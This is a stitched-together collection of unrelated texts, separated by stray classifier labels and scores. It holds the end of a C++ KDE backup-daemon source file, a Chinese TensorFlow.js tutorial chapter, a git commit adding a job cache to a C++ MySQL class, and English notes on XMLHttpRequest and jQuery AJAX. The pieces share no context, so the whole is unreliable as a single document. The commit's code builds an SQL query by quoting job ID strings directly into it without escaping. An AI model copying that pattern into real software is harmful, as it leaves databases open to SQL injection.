} void KeepMainWindow::slotAddBackup(Backup backup) { BackupConfig *backupConfig = new BackupConfig(); backupConfig->addBackup(backup); delete backupConfig; } void KeepMainWindow::slotRestoreBackupWizard() { RestoreBackupWizard *restoreBackupWizard = new RestoreBackupWizard(this, "restoreBackupWizard"); restoreBackupWizard->show(); } void KeepMainWindow::slotDaemonAlertState(bool state) { if ( !state ) { m_actionView->m_ledDaemonState->setColor(TQt::green); } else { m_actionView->m_ledDaemonState->setColor(TQt::red); } } bool KeepMainWindow::backupSystemRunning() { QCStringList modules; TQCString replyType; TQByteArray replyData; if ( !kapp->dcopClient()->call( "kded", "kded", "loadedModules()", TQByteArray(), replyType, replyData ) ) return false; else { if ( replyType == "QCStringList" ) { TQDataStream reply( replyData, IO_ReadOnly ); reply >> modules; } } QCStringList::ConstIterator end( modules.end() ); for ( QCStringList::ConstIterator it = modules.begin(); it != end; ++it ) { if ( *it == "keep" ) return true; } return false; } void KeepMainWindow::slotLoadDaemon() { TQCString service = "keep"; TQByteArray data, replyData; TQCString replyType; TQDataStream arg( data, IO_WriteOnly ); arg << service; if ( kapp->dcopClient()->call( "kded", "kded", "loadModule(TQCString)", data, replyType, replyData ) ) { TQDataStream reply( replyData, IO_ReadOnly ); if ( replyType == "bool" ) { bool result; reply >> result; if ( !result ) { return; } } else { KMessageBox::error( this, i18n( "Incorrect reply from KDED." ) ); return; } } else { KMessageBox::error( this, i18n( "Unable to contact KDED." ) ); return; } slotRefreshGUI(); } void KeepMainWindow::slotUnloadDaemon() { TQCString service = "keep"; TQByteArray data; TQDataStream arg( data, IO_WriteOnly ); arg << service; if ( !kapp->dcopClient()->send( "kded", "kded", "unloadModule(TQCString)", data ) ) { KMessageBox::error( this, i18n( "Unable to stop service." ) ); return; } slotRefreshGUI(); } void KeepMainWindow::slotReloadDaemon() { slotUnloadDaemon(); slotLoadDaemon(); } #include "keepmainwindow.moc"
__label__pos
0.872509
TensorFlow in JavaScript(Huan) Atwood’s Law “Any application that can be written in JavaScript, will eventually be written in JavaScript.” – Jeff Atwood, Founder of StackOverflow.com “JavaScript now works.” – Paul Graham, YC Founder TensorFlow.js 简介 ../../_images/tensorflow-js.gif TensorFlow.js 是 TensorFlow 的 JavaScript 版本,支持GPU硬件加速,可以运行在 Node.js 或浏览器环境中。它不但支持完全基于 JavaScript 从头开发、训练和部署模型,也可以用来运行已有的 Python 版 TensorFlow 模型,或者基于现有的模型进行继续训练。 ../../_images/architecture.gif TensorFlow.js 支持 GPU 硬件加速。在 Node.js 环境中,如果有 CUDA 环境支持,或者在浏览器环境中,有 WebGL 环境支持,那么 TensorFlow.js 可以使用硬件进行加速。 微信小程序 微信小程序也提供了官方插件,封装了TensorFlow.js库,利用小程序WebGL API给第三方小程序调用时提供GPU加速。 本章,我们将基于 TensorFlow.js 1.0,向大家简单地介绍如何基于 ES6 的 JavaScript 进行 TensorFlow.js 的开发,然后提供两个例子,并基于例子进行详细的讲解和介绍,最终实现使用纯 JavaScript 进行 TensorFlow 模型的开发、训练和部署。 章节代码地址 本章中提到的 JavaScript 版 TensorFlow 的相关代码,使用说明,和训练好的模型文件及参数,都可以在作者的 GitHub 上找到。地址: https://github.com/huan/tensorflow-handbook-javascript 浏览器中使用 TensorFlow.js 的优势 ../../_images/chrome-ml.png TensorFlow.js 可以让我们直接在浏览器中加载 TensorFlow,让用户立即通过本地的CPU/GPU资源进行我们所需要的机器学习运算,更灵活地进行AI应用的开发。 浏览器中进行机器学习,相对比与服务器端来讲,将拥有以下四大优势: • 不需要安装软件或驱动(打开浏览器即可使用); • 可以通过浏览器进行更加方便的人机交互; • 可以通过手机浏览器,调用手机硬件的各种传感器(如:GPS、电子罗盘、加速度传感器、摄像头等); • 用户的数据可以无需上传到服务器,在本地即可完成所需操作。 通过这些优势,TensorFlow.js 将给开发者带来极高的灵活性。比如在 Google Creative Lab 在2018年7月发布的 Move Mirror 里,我们可以在手机上打开浏览器,通过手机摄像头检测视频中用户的身体动作姿势,然后通过对图片数据库中类似身体动作姿势的检索,给用户显示一个最能够和他当前动作相似的照片。在Move Mirror的运行过程中,数据没有上传到服务器,所有的运算都是在手机本地,基于手机的CPU/GPU完成的,而这项技术,将使Servreless与AI应用结合起来成为可能。 ../../_images/move-mirror.jpg TensorFlow.js 环境配置 在浏览器中使用 TensorFlow.js 在浏览器中加载 TensorFlow.js ,最方便的办法是在 HTML 中直接引用 TensorFlow.js 发布的 NPM 包中已经打包安装好的 JavaScript 代码。 <html> <head> <script src="http://unpkg.com/@tensorflow/tfjs/dist/tf.min.js"></script> 在 Node.js 中使用 TensorFlow.js 服务器端使用 JavaScript ,首先需要按照 NodeJS.org 官网的说明,完成安装最新版本的 Node.js 。 然后,完成以下四个步骤即可完成配置: 1. 确认 Node.js 版本(v10 或更新的版本): $ node --verion v10.5.0 $ npm --version 6.4.1 2. 建立 TensorFlow.js 项目目录: $ mkdir tfjs $ cd tfjs 3. 安装 TensorFlow.js: # 初始化项目管理文件 package.json $ npm init -y # 安装 tfjs 库,纯 JavaScript 版本 $ npm install @tensorflow/tfjs # 安装 tfjs-node 库,C Binding 版本 $ npm install @tensorflow/tfjs-node # 安装 tfjs-node-gpu 库,支持 CUDA GPU 加速 $ npm install @tensorflow/tfjs-node-gpu 4. 确认 Node.js 和 TensorFlow.js 工作正常: $ node > require('@tensorflow/tfjs').version { 'tfjs-core': '1.3.1', 'tfjs-data': '1.3.1', 'tfjs-layers': '1.3.1', 'tfjs-converter': '1.3.1', tfjs: '1.3.1' } > 如果你看到了上面的 tfjs-core, tfjs-data, tfjs-layerstfjs-converter 的输出信息,那么就说明环境配置没有问题了。 然後,在 JavaScript 程序中,通过以下指令,即可引入 TensorFlow.js: import * as tf from '@tensorflow/tfjs' console.log(tf.version.tfjs) // Output: 1.3.1 使用 import 加载 JavaScript 模块 import 是 JavaScript ES6 版本新开始拥有的新特性。粗略可以认为等价于 require。比如:import * as tf from '@tensorflow/tfjs'const tf = require('@tensorflow/tfjs') 对上面的示例代码是等价的。希望了解更多的读者,可以访问 MDN 文档 在微信小程序中使用 TensorFlow.js TensorFlow.js 微信小程序插件封装了 TensorFlow.js 库,用于提供给第三方小程序调用。 在使用插件前,首先要在小程序管理后台的“设置-第三方服务-插件管理”中添加插件。开发者可登录小程序管理后台,通过 appid _wx6afed118d9e81df9_ 查找插件并添加。本插件无需申请,添加后可直接使用。 例子可以看 TFJS Mobilenet: 物体识别小程序 TensorFlow.js 微信小程序官方文档地址 TensorFlow.js 微信小程序教程 为了推动微信小程序中人工智能应用的发展,Google 专门为微信小程序打造了最新 TensorFlow.js 插件,并联合 Google 认证机器学习专家、微信、腾讯课堂 NEXT 学院,联合推出了“NEXT学院:TensorFlow.js遇到小程序”课程,帮助小程序开发者带来更加易于上手和流畅的 TensorFlow.js 开发体验。 上述课程主要介绍了如何将 TensorFlow.js 插件嵌入到微信小程序中,并基于其进行开发。课程中以一个姿态检测的模型 PoseNet 作为案例,介绍了 TensorFlow.js 插件导入到微信小程序开发工具中后,在项目开发中的配置,功能调用,加载模型等方法应用;此外,还介绍了在 Python 环境下训练好的模型如何转换并载入到小程序中。 本章作者也参与了课程制作,课程中的案列简单有趣易上手,通过学习,可以快速熟悉 TensorFlow.js 在小程序中的开发和应用.有兴趣的读者可以前往 NEXT 学院,进行后续深度学习。 课程地址:https://ke.qq.com/course/428263 TensorFlow.js 模型部署 通过 TensorFlow.js 加载 Python 模型 一般 TensorFlow 的模型,会被存储为 SavedModel 格式。这也是 Google 目前推荐的模型保存最佳实践。SavedModel 格式可以通过 tensorflowjs-converter 转换器转换为可以直接被 TensorFlow.js 加载的格式,从而在JavaScript语言中进行使用。 1. 安装 tensorflowjs_converter $ pip install tensorflowjs tensorflowjs_converter 的使用细节,可以通过 --help 参数查看程序帮助: $ tensorflowjs_converter --help 1. 以下我们以 MobilenetV1 为例,看一下如何对模型文件进行转换操作,并将可以被 TensorFlow.js 加载的模型文件,存放到 /mobilenet/tfjs_model 目录下。 转换 SavedModel:将 /mobilenet/saved_model 转换到 /mobilenet/tfjs_model tensorflowjs_converter \ --input_format=tf_saved_model \ --output_node_names='MobilenetV1/Predictions/Reshape_1' \ --saved_model_tags=serve \ /mobilenet/saved_model \ /mobilenet/tfjs_model 转换完成的模型,保存为了两类文件: • model.json:模型架构 • group1-shard*of*:模型参数 举例来说,我们对 MobileNet v2 转换出来的文件,如下: /mobilenet/tfjs_model/model.json /mobilenet/tfjs_model/group1-shard1of5 … /mobilenet/tfjs_model/group1-shard5of5 1. 为了加载转换完成的模型文件,我们需要安装 tfjs-converter@tensorflow/tfjs 模块: $ npm install @tensorflow/tfjs 2. 然后,我们就可以通过 JavaScript 来加载 TensorFlow 模型了! import * as tf from '@tensorflow/tfjs' const MODEL_URL = '/mobilenet/tfjs_model/model.json' const model = await tf.loadGraphModel(MODEL_URL) const cat = document.getElementById('cat') model.execute(tf.browser.fromPixels(cat)) 转换 TFHub 模型 将 TFHub 模型 https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/classification/1 转换到 /mobilenet/tfjs_model: tensorflowjs_converter \\ --input_format=tf_hub \\ 'https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/classification/1' \\ /mobilenet/tfjs_model 使用 TensorFlow.js 模型库 TensorFlow.js 提供了一系列预训练好的模型,方便大家快速地给自己的程序引入人工智能能力。 模型库 GitHub 地址:https://github.com/tensorflow/tfjs-models,其中模型分类包括图像识别、语音识别、人体姿态识别、物体识别、文字分类等。 由于这些API默认模型文件都存储在谷歌云上,直接使用会导致中国用户无法直接读取。在程序内使用模型API时要提供 modelUrl 的参数,可以指向谷歌中国的镜像服务器。 谷歌云的base url是 https://storage.googleapis.com, 中国镜像的base url是 https://www.gstaticcnapps.cn 模型的url path是一致的。以 posenet模型为例: • 谷歌云地址是:https://storage.googleapis.com/tfjs-models/savedmodel/posenet/mobilenet/float/050/model-stride16.json • 中国镜像地址是:https://www.gstaticcnapps.cn/tfjs-models/savedmodel/posenet/mobilenet/float/050/model-stride16.json 在浏览器中使用 MobileNet 进行摄像头物体识别 这里我们将通过一个简单的 HTML 页面,来调用 TensorFlow.js 和与训练好的 MobileNet ,在用户的浏览器中,通过摄像头来识别图像中的物体是什么。 1. 我们建立一个 HTML 文件,在头信息中,通过将 NPM 模块转换为在线可以引用的免费服务 unpkg.com,来加载 @tensorflow/tfjs@tensorflow-models/mobilenet 两个 TFJS 模块: <head> <script src="https://unpkg.com/@tensorflow/tfjs"></script> <script src="https://unpkg.com/@tensorflow-models/mobilenet"> </script> </head> 1. 我们声明三个 HTML 元素:用来显示视频的 <video>,用来显示我们截取特定帧的 <img>,和用来显示检测文字结果的 <p> <video width=400 height=300></video> <p></p> <img width=400 height=300 /> 1. 我们通过 JavaScript ,将对应的 HTML 元素进行初始化:video, image, status 三个变量分别用来对应 <video>, <img>, <p> 三个 HTML 元素,canvasctx 用来做从摄像头获取视频流数据的中转存储。model 将用来存储我们从网络上加载的 MobileNet: const video = document.querySelector('video') const image = document.querySelector('img') const status = document.querySelector("p") const canvas = document.createElement('canvas') const ctx = canvas.getContext('2d') let model 1. main() 用来初始化整个系统,完成加载 MobileNet 模型,将用户摄像头的数据绑定 <video> 这个 HTML 元素上,最后触发 refresh() 函数,进行定期刷新操作: async function main () { status.innerText = "Model loading..." model = await mobilenet.load() status.innerText = "Model is loaded!" const stream = await navigator.mediaDevices.getUserMedia({ video: true }) video.srcObject = stream await video.play() canvas.width = video.videoWidth canvas.height = video.videoHeight refresh() } 1. refresh() 函数,用来从视频中取出当前一帧图像,然后通过 MobileNet 模型进行分类,并将分类结果,显示在网页上。然后,通过 setTimeout,重复执行自己,实现持续对视频图像进行处理的功能: async function refresh(){ ctx.drawImage(video, 0,0) image.src = canvas.toDataURL('image/png') await model.load() const predictions = await model.classify(image) const className = predictions[0].className const percentage = Math.floor(100 * predictions[0].probability) status.innerHTML = percentage + '%' + ' ' + className setTimeout(refresh, 100) } 整体功能,只需要一个文件,几十行 HTML/JavaScript 即可实现。可以直接在浏览器中运行,完整的 HTML 代码如下: <html> <head> <script src="https://unpkg.com/@tensorflow/tfjs"></script> <script src="https://unpkg.com/@tensorflow-models/mobilenet"> </script> </head> <video width=400 height=300></video> <p></p> <img width=400 height=300 /> <script> const video = document.querySelector('video') const image = document.querySelector('img') const status = document.querySelector("p") const canvas = document.createElement('canvas') const ctx = canvas.getContext('2d') let model main() async function main () { status.innerText = "Model loading..." model = await mobilenet.load() status.innerText = "Model is loaded!" const stream = await navigator.mediaDevices.getUserMedia({ video: true }) video.srcObject = stream await video.play() canvas.width = video.videoWidth canvas.height = video.videoHeight refresh() } async function refresh(){ ctx.drawImage(video, 0,0) image.src = canvas.toDataURL('image/png') await model.load() const predictions = await model.classify(image) const className = predictions[0].className const percentage = Math.floor(100 * predictions[0].probability) status.innerHTML = percentage + '%' + ' ' + className setTimeout(refresh, 100) } </script> </html> 运行效果截图如下。可以看到,水杯被系统识别为了 “beer glass” 啤酒杯,置信度 90% : ../../_images/mobilenet.png TensorFlow.js 模型训练 * 与 TensorFlow Serving 和 TensorFlow Lite 不同,TensorFlow.js 不仅支持模型的部署和推断,还支持直接在 TensorFlow.js 中进行模型训练、 在 TensorFlow 基础章节中,我们已经用 Python 实现过,针对某城市在 2013-2017 年的房价的任务,通过对该数据进行线性回归,即使用线性模型 y = ax + b 来拟合上述数据,此处 ab 是待求的参数。 下面我们改用 TensorFlow.js 来实现一个 JavaScript 版本。 首先,我们定义数据,进行基本的归一化操作。 const xsRaw = tf.tensor([2013, 2014, 2015, 2016, 2017]) const ysRaw = tf.tensor([12000, 14000, 15000, 16500, 17500]) // 归一化 const xs = xsRaw.sub(xsRaw.min()) .div(xsRaw.max().sub(xsRaw.min())) const ys = ysRaw.sub(ysRaw.min()) .div(ysRaw.max().sub(ysRaw.min())) 接下来,我们来求线性模型中两个参数 ab 的值。 使用 loss() 计算损失; 使用 optimizer.minimize() 自动更新模型参数。 JavaScript 中的胖箭头函数(Fat Arrow Function) 从 JavaScript 的 ES6 版本开始,允许使用箭头函数(=>)来简化函数的声明和书写,类似于Python中的lambda表达式。例如,以下箭头函数: const sum = (a, b) => { return a + b } 在效果上等价为如下的传统函数: const sum = function (a, b) { return a + b } 不过箭头函数中没有自己的 thisarguments,不可以被当做构造函数(new),也不可以被当做 Generator (无法使用 yield)。感兴趣的读者可以参考 MDN 文档 以了解更多。 TensorFlow.js 中的 dataSync() 系列数据同步函数 它的作用是把 Tensor 数据从 GPU 中取回来,可以理解为与 Python 中的 .numpy() 功能相当,即将数据取回,供本地显示,或本地计算使用。感兴趣的读者可以参考 TensorFlow.js 文档 以了解更多。 TensorFlow.js 中的 sub() 系列数学计算函数 TensorFlow.js 支持 tf.sub(a, b)a.sub(b) 两种方法的数学函数调用。其效果是等价的,读者可以根据自己的喜好来选择。感兴趣的读者可以参考 TensorFlow.js 文档 以了解更多。 const a = tf.scalar(Math.random()).variable() const b = tf.scalar(Math.random()).variable() // y = a * x + b. const f = (x) => a.mul(x).add(b) const loss = (pred, label) => pred.sub(label).square().mean() const learningRate = 1e-3 const optimizer = tf.train.sgd(learningRate) // 训练模型 for (let i = 0; i < 10000; i++) { optimizer.minimize(() => loss(f(xs), ys)) } // 预测 console.log(`a: ${a.dataSync()}, b: ${b.dataSync()}`) const preds = f(xs).dataSync() const trues = ys.arraySync() preds.forEach((pred, i) => { console.log(`x: ${i}, pred: ${pred.toFixed(2)}, true: ${trues[i].toFixed(2)}`) }) 从下面的输出样例中我们可以看到,已经拟合得比较接近了。 a: 0.9339302778244019, b: 0.08108722418546677 x: 0, pred: 0.08, true: 0.00 x: 1, pred: 0.31, true: 0.36 x: 2, pred: 0.55, true: 0.55 x: 3, pred: 0.78, true: 0.82 x: 4, pred: 1.02, true: 1.00 可以直接在浏览器中运行,完整的 HTML 代码如下: <html> <head> <script src="http://unpkg.com/@tensorflow/tfjs/dist/tf.min.js"></script> <script> const xsRaw = tf.tensor([2013, 2014, 2015, 2016, 2017]) const ysRaw = tf.tensor([12000, 14000, 15000, 16500, 17500]) // 归一化 const xs = xsRaw.sub(xsRaw.min()) .div(xsRaw.max().sub(xsRaw.min())) const ys = ysRaw.sub(ysRaw.min()) .div(ysRaw.max().sub(ysRaw.min())) const a = tf.scalar(Math.random()).variable() const b = tf.scalar(Math.random()).variable() // y = a * x + b. const f = (x) => a.mul(x).add(b) const loss = (pred, label) => pred.sub(label).square().mean() const learningRate = 1e-3 const optimizer = tf.train.sgd(learningRate) // 训练模型 for (let i = 0; i < 10000; i++) { optimizer.minimize(() => loss(f(xs), ys)) } // 预测 console.log(`a: ${a.dataSync()}, b: ${b.dataSync()}`) const preds = f(xs).dataSync() const trues = ys.arraySync() preds.forEach((pred, i) => { console.log(`x: ${i}, pred: ${pred.toFixed(2)}, true: ${trues[i].toFixed(2)}`) }) </script> </head> </html> TensorFlow.js 性能对比 关于 TensorFlow.js 的性能,Google 官方做了一份基于 MobileNet 的评测,可以作为参考。具体评测是基于 MobileNet 的 TensorFlow 模型,将其 JavaScript 版本和 Python 版本各运行两百次,其评测结论如下。 手机浏览器性能:(单位:毫秒ms) ../../_images/performance-mobile.png TensorFlow.js 在手机浏览器中运行一次推理: • 在 iPhoneX 上需要时间为 22ms • 在 Pixel3 上需要时间为 100ms 与 TensorFlow Lite 代码基准相比,手机浏览器中的 TensorFlow.js 在 IPhoneX 上的运行时间为基准的1.2倍,在 Pixel3 上运行的时间为基准的 1.8 倍。 台式机浏览器性能:(单位:毫秒ms) 在浏览器中,TensorFlow.js 可以使用 WebGL 进行硬件加速,将 GPU 资源使用起来。 ../../_images/performance-browser.gif TensorFlow.js 在浏览器中运行一次推理: • 在 CPU 上需要时间为 97ms • 在 GPU (WebGL)上需要时间为 10ms 与 Python 代码基准相比,浏览器中的 TensorFlow.js 在 CPU 上的运行时间为基准的1.7倍,在 GPU (WebGL) 上运行的时间为基准的3.8倍。 Node.js 性能: 在 Node.js 中,TensorFlow.js 使用 TensorFlow 的 C Binding ,所以基本上可以达到和 Python 接近的效果。 ../../_images/performance-node.png TensorFlow.js 在 Node.js 运行一次推理: • 在 CPU 上需要时间为56ms • 在 GPU (CUDA) 上需要时间为14ms 与 Python 代码基准相比,Node.js 的 TensorFlow.js 在 CPU 上的运行时间与基准相同,在 GPU(CUDA) 上运行的时间是基准的1.6倍。
__label__pos
0.579558
Commit 0f38456f authored by Alessio Netti's avatar Alessio Netti Browse files Merge remote-tracking branch 'origin/development' into development parents 0b053866 3da788c6 ......@@ -121,12 +121,24 @@ PerSystDB::~PerSystDB(){ bool PerSystDB::getDBJobIDs(std::vector<std::string> & job_id_strings, std::map<std::string, std::string>& job_id_map) { std::lock_guard<std::mutex> lock(mut); std::vector<std::string> notfound; for(auto & job_id_str: job_id_strings){ auto found = _jobCache.find(job_id_str); if(found != _jobCache.end()){ job_id_map[job_id_str] = found->second.job_id_db; found->second.last_seen_timestamp = getTimestamp(); } else { notfound.push_back(job_id_str); } } if(!notfound.size()){ //every job was found return true; } std::stringstream build_query; build_query << "SELECT job_id, job_id_string FROM Accounting WHERE job_id_string IN ("; for (std::vector<std::string>::size_type i = 0; i < job_id_strings.size(); ++i) { build_query << "'" << job_id_strings[i] << "'"; if (i != job_id_strings.size() - 1) { //not last element for (std::vector<std::string>::size_type i = 0; i < notfound.size(); ++i) { build_query << "'" << notfound[i] << "'"; if (i != notfound.size() - 1) { //not last element build_query << ","; } } ......@@ -143,13 +155,28 @@ bool PerSystDB::getDBJobIDs(std::vector<std::string> & job_id_strings, std::map< MYSQL_ROW row; while ((row = result.fetch_row())) { if (row[0]) { job_id_map[std::string(row[1])] = row[0]; std::string job_id_db = row[0]; std::string job_id_string = std::string(row[1]); job_id_map[job_id_string] = job_id_db; addJobToCache(job_id_string, job_id_db); } } } return true; } void PerSystDB::addJobToCache(std::string &job_id_string, std::string & job_id_db){ if(_jobCache.size() == JOB_CACHE_MAX_SIZE){ //remove one element before inserting using MyPairType = std::pair<std::string, PerSystDB::Job_info_t>; auto smallest = std::min_element(_jobCache.begin(), _jobCache.end(), [](const MyPairType& l, const MyPairType& r) -> bool {return l.second.last_seen_timestamp < r.second.last_seen_timestamp;}); _jobCache.erase(smallest); } Job_info_t ji; ji.job_id_db = job_id_db; ji.last_seen_timestamp = getTimestamp(); _jobCache[job_id_string] = ji; } bool PerSystDB::getCurrentSuffixAggregateTable(std::string & suffix){ if(_end_aggregate_timestamp){ ...... ......@@ -45,14 +45,17 @@ struct Aggregate_info_t { float severity_average; }; class PerSystDB { private: struct Job_info_t { std::string job_id_db; unsigned long long last_seen_timestamp; }; class PerSystDB { public: enum Rotation_t { EVERY_YEAR, EVERY_MONTH, EVERY_XDAYS //number of days must be provided EVERY_YEAR, EVERY_MONTH, EVERY_XDAYS //number of days must be provided }; protected: ......@@ -70,30 +73,66 @@ protected: static PerSystDB * instance; static std::mutex mut; bool _initialized; std::map<std::string, Job_info_t> _jobCache; const std::size_t JOB_CACHE_MAX_SIZE = 10000; /** print error. * Prints the mysql error message. If connection is gone (Error 2006) then we also close the connection. * Please check with isInitialized() to initialize it again. */ void print_error(); bool getCurrentSuffixAggregateTable(std::string & new_suffix); bool createNewAggregate(std::string& new_suffix); void getNewDates(const std::string& last_end_timestamp, std::string & begin_timestamp, std::string & end_timestamp); void addJobToCache(std::string &job_id_string, std::string & job_id_db); public: bool initializeConnection(const std::string & host, const std::string & user, const std::string & password, const std::string & database_name, Rotation_t rotation, int port =3306, unsigned int every_x_days = 0); bool finalizeConnection(); /** * Connect to database. */ bool initializeConnection(const std::string & host, const std::string & user, const std::string & password, const std::string & database_name, Rotation_t rotation, int port = 3306, unsigned int every_x_days = 0); bool isInitialized(){ return _initialized; } /** * Disconnect */ bool finalizeConnection(); /** * Check if job_id (db) exist. If map empty it doesn't exist/job not found is not yet on accounting. * @param job_id_strings job id strings including array jobid. * @param job_id_map job_id_string to job_id (db) map */ bool getDBJobIDs(std::vector<std::string> & job_id_strings, std::map<std::string, std::string>& job_id_map); /** * Insert job in the accounting table. */ bool insertIntoJob(const std::string& job_id_string, unsigned long long uid, int & job_id_db, const std::string & suffix); void getNewDates(const std::string& last_end_timestamp, std::string & begin_timestamp, std::string & end_timestamp); /** * Insert performance data into the aggregate table (Aggregate_<suffix> */ bool insertInAggregateTable(const std::string& suffix, Aggregate_info_t & agg_info); /** * Update the last suffix in the Accounting table */ bool updateJobsLastSuffix(std::map<std::string, std::string>& job_map, std::string & suffix); /** * Get the next or the current table suffix */ bool getTableSuffix(std::string & table_suffix); /** * Singleton object. Get here your instance! */ static PerSystDB * getInstance(); }; ...... ......@@ -116,6 +116,23 @@ void PerSystSqlOperator::printConfig(LOG_LEVEL ll) { LOG_VAR(ll) << "\tseverity_max_memory=" << _severity_max_memory; } bool PerSystSqlOperator::execOnStart(){ if( _backend == MARIADB ) { if(!_persystdb->initializeConnection(_conn.host, _conn.user, _conn.password, _conn.database_name, _conn.rotation, _conn.port, _conn.every_x_days)){ LOG(error) << "Database not initialized"; return false; } } return true; } void PerSystSqlOperator::execOnStop(){ if( _backend == MARIADB ) { _persystdb->finalizeConnection(); } } void PerSystSqlOperator::compute(U_Ptr unit, qeJobData& jobData) { // Clearing the buffer, if already allocated _buffer.clear(); ......@@ -150,8 +167,13 @@ void PerSystSqlOperator::compute(U_Ptr unit, qeJobData& jobData) { compute_internal(unit, _buffer, agg_info); if( _backend == MARIADB ) { if(!_persystdb->initializeConnection(_conn.host, _conn.user, _conn.password, _conn.database_name, _conn.rotation, _conn.port, _conn.every_x_days)) if (!_persystdb->isInitialized() && !_persystdb->initializeConnection(_conn.host, _conn.user, _conn.password, _conn.database_name, _conn.rotation, _conn.port, _conn.every_x_days)) { LOG(error) << "Database not initialized"; return; } std::stringstream jobidBuilder; jobidBuilder << jobData.jobId; ......@@ -185,7 +207,6 @@ void PerSystSqlOperator::compute(U_Ptr unit, qeJobData& jobData) { agg_info.timestamp = (my_timestamp/1e9); _persystdb->insertInAggregateTable(table_suffix, agg_info); // _persystdb->finalizeConnection(); } } ...... ......@@ -148,6 +148,8 @@ protected: void compute_internal(U_Ptr& unit, vector<reading_t>& buffer, Aggregate_info_t &agg_info); double computeSeverityAverage(vector<double> & buffer); void convertToDoubles(std::vector<reading_t> &buffer, std::vector<double> &douBuffer); bool execOnStart() override; void execOnStop() override; }; double severity_formula1(double metric, double threshold, double exponent); ...... Supports Markdown 0% or . You are about to add 0 people to the discussion. Proceed with caution. Finish editing this message first! Please register or to comment
__label__pos
0.89594
Barbarian Meets Codingbarbarianmeetscoding WebDev, UX & a Pinch of Fantasy 6 minutes read AJAX and XMLHttpRequest This article is part of my personal wiki where I write personal notes while I am learning new technologies. You are welcome to use it for your own learning! XMLHttpRequest The XMLHttpRequest is a web api that allows you to send/receive HTTP requests from the browser to the server. Sending an HTTP request with XMLHttpRequest consists on these steps: 1. Instantiate an XMLHttpRequest object 2. Open a URL 3. Optionally configure the XMLHttpRequest object and add event handlers for asynchronous HTTP communication. It is better to configure after the XHR is open because some options only work when the XHR is open. 4. Send the request var result; // 1. Instantiate object var xhr = new XMLHttpRequest(); // 2. open url xhr.open("get", "http://www.myapi.com/api", /* async */ true); // 3. configure and add event handlers xhr.onreadystatechange = function(e){ if (xhr.readyState === 4){ // DONE if (xhr.status === 200){ result = xhr.response; } else { console.error("Error response: ", xhr.status); } } }; xhr.ontimeout = function(e){ console.error("Request timed-out"); } // 4. send request xhr.send(); The open method allows you to provide some basic configuration for the XHR request: open(method, url, async, user, password); The send method lets you send the request with or without data (depending on the type of request): send(); send(data); Example: Using XHR to get some JSON See this jsFiddle: <button id="get-repos">Get Vintharas Repos! in JSON!!</button> <pre id="response"></pre> console.log('loading event handlers'); var $code = document.getElementById("response"); var $getReposBtn = document.getElementById("get-repos"); $getReposBtn.onclick = function(){ var xhr = new XMLHttpRequest(); xhr.timeout = 2000; xhr.onreadystatechange = function(e){ console.log(this); if (xhr.readyState === 4){ if (xhr.status === 200){ $code.innerHTML = xhr.response; } else { console.error("XHR didn't work: ", xhr.status); } } } xhr.ontimeout = function (){ console.error("request timedout: ", xhr); } xhr.open("get", "https://api.github.com/users/vintharas/repos", /*async*/ true); xhr.send(); } XMLHttpRequest properties PropertyDescription readyState get current state of the XHR object response get the response returned from the server according to responseType responseBody gets the response body as an array of bytes responseText gets the response body as a string responseType gets/sets the data type associated with the response, such as blob, text, array-buffer, json, document, etc. By default it is an empty string that denotes that the response type is string. This is actually only used when deserializing the body of a response, it doesn't affect the HTTP accept headers sent to the server. The way it works is, for instance, that if you set "json", you can get javascript objects directly from the "xhr.response" property, whereas if you leave it empty or use "text" you get a text version of the json response in the "xhr.response" property. responseXML gets the response body as an XML DOM object status gets the HTTP Status code of the response statusText Gets the friendly HTTP status code text timeout Sets the timeout threshold for the requests withCredentials specifies whether the request should include user credentials XMLHttpRequest methods MethodDescription abort cancel current request getAllResponseHeaders get a complete list of the response headers getResponseHeader get specific response header send make the http request and receive the response setRequestHeader add a HTTP header to the request open set the properties for the request such as URL, username and password XMLHttpRequest events • ontimeout: lets you handle a timeout (having configured the timeout in the XMLTHttpRequest object) • onreadystatechange: lets you handle the event of the state of the XMLHttpRequest changing within these states: [UNSENT, OPENED, HEADERS_RECEIVED, LOADING, DONE]. It is used in async calls. • upload: helps you track an ongoing upload AJAX and jQuery jQuery provides simplified wrappers around the XMLHttpRequest object: $.ajax(), $.get(), $.post(), $.getJSON(), etc. $.ajax method The $.ajax method allows you to make async HTTP requests: $.ajax(url [, settings]) $.ajax([settings]) // all settings are optional, you can set defaults via $.ajaxSetup() A common GET request with $.ajax could be: var $response = document.getElementById("response"); $.ajax("https://api.github.com/users/vintharas/repos") .done(function(data){ $response.innerHTML = JSON.stringify(data,null,2); } As you can see the $.ajax method returns a jqXHR object with the Promise interface: done (success), fail (error), always (complete) and then method usually available to promises. $.get The $.get method is a simplification of the $.ajax method to handle purely get requests: $.get([settings]); $.get(url [, data] [, success] [,dataType]) // it is equivalent to $.ajax({ url: url, data: data, success: sucess, dataType: dataType }) where: • url is the url to which the request is sent • data is an object or string to send to the server • success is a success callback • dataType is the type of data expected from the server (xml, json, script or html) This method also returns a jqXHR object that acts as a promise. $.getJSON The $.getJSON method is a shorthand for: $.ajax({ dataType: "json", url: url, data: data, success: success }) // it looks like this $.getJSON(url [, data] [, success]) Forms Sending Data to a server using a Form Serializing a Form Data With jQuery References Jaime González García Written by Jaime González García , Dad, Husband, Front-end software engineer, UX designer, amateur pixel artist, tinkerer and master of the arcane arts. You should follow him on Twitter where he shares useful stuff! (and is funny too).Jaime González García
__label__pos
0.631841
